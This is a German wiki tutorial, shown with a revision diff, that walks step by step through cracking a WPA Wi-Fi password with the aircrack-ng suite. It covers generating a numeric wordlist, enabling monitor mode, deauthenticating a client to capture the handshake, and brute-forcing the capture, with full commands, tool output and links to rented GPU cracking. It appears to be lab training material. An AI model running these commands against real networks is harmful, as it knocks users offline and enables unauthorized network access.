Wlan Bruteforce Attacke: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 49: Zeile 49:
  
 
=monitor modus=
 
=monitor modus=
*airmon-ng start wlan1
+
*airmon-ng start $INT
airmon-ng start wlan1
 
<pre>
 
Found 5 processes that could cause trouble.
 
If airodump-ng, aireplay-ng or airtun-ng stops working after
 
a short period of time, you may want to kill (some of) them!
 
 
 
  PID Name
 
  618 NetworkManager
 
  712 wpa_supplicant
 
  825 avahi-daemon
 
  826 avahi-daemon
 
1520 dhclient
 
 
 
PHY Interface Driver Chipset
 
 
 
phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)
 
phy1 wlan1 rtl8192cu Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]
 
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
 
(mac80211 station mode vif disabled for [phy1]wlan1)
 
</pre>
 
  
 
=killen der problem prozesse=
 
=killen der problem prozesse=

Version vom 14. Oktober 2020, 16:11 Uhr

vorgehen

  1. Passwort liste generieren
  2. Interface suchen
  3. Interface Monitor mode
  4. Prozesse die stören killen
  5. Wlans anzeigen
  6. capture AP
  7. auf Client Handshake warten (eventuell Verbindung killen)
  8. Brute Force auf Datei starten
  9. Erfolg


passwordlist generieren

  • crunch 8 8 0123456789 -o password.lst
Crunch will now generate the following amount of data: 900000000 bytes
858 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 100000000 

crunch:  19% completed generating output

crunch:  38% completed generating output

crunch:  58% completed generating output

crunch:  76% completed generating output

crunch:  95% completed generating output

crunch: 100% completed generating output

stoppen von störenden Diensten

  • systemctl stop avahi-daemon
  • systemctl stop NetworkManager

list

  • airmon-ng
PHY     Interface       Driver          Chipset

phy0    wlan0           rtl8192cu       Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]

echo INT=wlan0 >> data source data

monitor modus

  • airmon-ng start $INT

killen der problem prozesse

  • kill -9 618
  • kill -9 712
  • kill -9 825
  • kill -9 826
  • kill -9 1520

checken

  • airmon-ng check wlan1mon
No interfering processes found
falls noch was gestartet
  • systemctl stop avahi-daemon
  • systemctl stop NetworkManager

dump

Wir suchen nach der BSSID von dd-wrt

  • airodump-ng wlan1mon

Wlan1mon1.jpg

handshake besorgen

  • BSSIDSTADION=44:74:6C:54:68:E8 # Wird später gebraucht
  • BSSIDAP=00:18:F8:DA:F7:94
  • CHANNEL=6
  • airodump-ng --bssid $BSSIDAP -c $CHANNEL -w wlan.cap wlan1mon

Wlan1mon2.jpg

zweites fenster öffnen (sends deauthentication packets)

  • BSSIDSTADION=44:74:6C:54:68:E8
  • BSSIDAP=00:18:F8:DA:F7:94
  • aireplay-ng -0 50 -a $BSSIDAP -c $BSSIDSTADION wlan1mon
11:02:39  Waiting for beacon frame (BSSID: 00:18:F8:DA:F7:94) on channel 6
11:02:39  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 4 ACKs]
11:02:40  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 6 ACKs]
11:02:40  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 8 ACKs]
11:02:41  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 7 ACKs]
11:02:44  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|43 ACKs]
11:02:49  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [36|68 ACKs]
11:02:55  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
11:03:00  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
11:03:05  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
11:03:10  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
11:03:15  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:21  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 4|65 ACKs]
11:03:26  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:32  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|61 ACKs]
11:03:37  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|65 ACKs]
11:03:42  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|63 ACKs]
11:03:47  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:52  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:57  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [26|67 ACKs]
11:04:02  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
11:04:07  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
11:04:12  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]

bis der client rausfliegt

nach dem wiederverbinden kommt der handshake

Wlan1mon3.jpg

handshake

HANDSHAKE=00:18:F8:DA:F7:94

cracken

  • aircrack-ng -w password.lst -b $BSSIDAP wlan.cap-01.cap

Wlan1mon4.jpg

Crack geschwindigkeiten

Laptop Schaft circa 1000 Keys pro Sekunde

eine starke Grafikkarte (Titan XP) schaft 520000 hash/s

Bei bedarf kann man sich auch online Rechen power mieten

https://www.gpuhash.me/?menu=en-tasks

oder sich ein Cluster aus mehreren Grafikkarten bauen


Quelle http://www.crackingservice.com/?q=node/20

Abgerufen von „http://wiki.ixheim.de/index.php?title=Wlan_Bruteforce_Attacke&oldid=22057